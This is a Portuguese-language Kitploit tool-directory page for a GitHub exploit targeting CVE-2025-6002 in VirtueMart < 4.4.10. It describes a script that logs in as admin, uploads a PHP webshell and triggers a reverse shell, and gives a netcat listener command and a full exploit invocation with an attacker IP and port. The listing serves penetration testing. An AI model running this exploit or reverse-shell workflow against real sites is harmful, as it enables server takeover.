Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-6002 — Exploit em Python para CVE-2025-6002 visando upload arbitrário de arquivos autenticado no VirtueMart < 4.4.10. Faz login, faz upload de um webshell PHP e aciona um shell reverso para testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de Penetração
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Exploit em Python para CVE-2025-6002 visando upload arbitrário de arquivos autenticado no VirtueMart < 4.4.10. Faz login, faz upload de um webshell PHP e aciona um shell reverso para testes de penetração.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 4 mesesAinda não revisado

Exploit para CVE-2025-6002

Este script explora a vulnerabilidade de upload arbitrário de arquivos autenticado no VirtueMart < 4.4.10 (CVE-2025-6002), descrita neste post do blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Este script faz login no VirtueMart com as credenciais fornecidas, cria um novo produto e envia um webshell PHP como um arquivo de mídia. Em seguida, invoca um reverse shell para o IP/porta fornecidos.

Parâmetros:

  • --url: A URL do VirtueMart
  • --username: nome de usuário admin
  • --password: senha admin
  • --remote-ip: attacker ip addresshttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: porta do atacante

Uso:

  1. Execute o Netcat na máquina do atacante:
root@kitploit:~
nc -nlvp 1337
  1. Execute o exploit
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Baixar ferramenta